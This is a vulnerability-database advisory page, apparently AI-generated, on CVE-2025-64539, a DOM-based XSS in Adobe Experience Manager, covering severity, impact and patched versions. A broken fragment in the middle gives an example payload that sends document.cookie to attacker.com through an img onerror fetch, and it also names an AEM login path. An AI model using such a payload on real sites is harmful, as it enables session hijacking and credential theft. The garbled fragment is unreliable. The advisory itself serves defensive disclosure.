
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-64539 is a DOM-based Cross-Site Scripting (XSS) vulnerability in Adobe Experience Manager (AEM) that could lead to arbitrary code execution in the victim's browser context. It affects AEM versions 6.5.23 and earlier (on-premises), AEM 6.5 LTS, and AEM Cloud Service versions prior to 2025.12.0. Adobe disclosed and patched this vulnerability on December 9, 2025, with NVD publication on December 10, 2025. It carries a CVSS v3.1 base score of 9.3 (Critical) (Adobe Advisory).
The vulnerability is classified under CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), specifically as a DOM-based XSS variant (CAPEC-588). An unauthenticated attacker can inject malicious scripts into a web page that are subsequently executed within the victim's browser DOM without server-side processing, bypassing traditional server-side output encoding defenses. Exploitation requires no privileges but does require user interaction — the victim must visit a crafted malicious page. No public proof-of-concept exploit code has been identified at this time (Adobe Advisory).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of the victim's browser session, enabling session takeover, credential theft, and unauthorized actions on behalf of the authenticated user. The vulnerability has a high confidentiality and integrity impact (with no availability impact), and its changed scope indicates that the attack can affect resources beyond the vulnerable component itself. In enterprise AEM deployments, this could expose sensitive content management data, author credentials, and internal workflows to unauthorized parties (Adobe Advisory).
/libs/granite/core/content/login.html).#<img src=x onerror=fetch('https://attacker.com/?c='+document.cookie)> or similar DOM-manipulation payload).Adobe has released patches addressing this vulnerability: AEM on-premises users should upgrade to version 6.5.24.0 or later, and AEM Cloud Service customers should update to the 2025.12.0 release or later. No specific configuration-based workaround has been published; upgrading to the patched version is the recommended remediation. Additionally, organizations should implement strict Content Security Policy (CSP) headers, enforce input validation and output encoding, and monitor for suspicious user session activity as compensating controls (Adobe Advisory).
The vulnerability was noted in CIS's December 2025 advisory covering multiple Adobe product vulnerabilities, and was included in CISA's weekly vulnerability bulletin (SB25-349). Security aggregators including BeyondMachines and Fortress SRM highlighted it as part of Adobe's December 2025 patch cycle. No significant independent researcher commentary or social media discussion specific to this CVE has been identified, consistent with the absence of a public PoC or active exploitation (CIS Advisory, CISA Bulletin).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."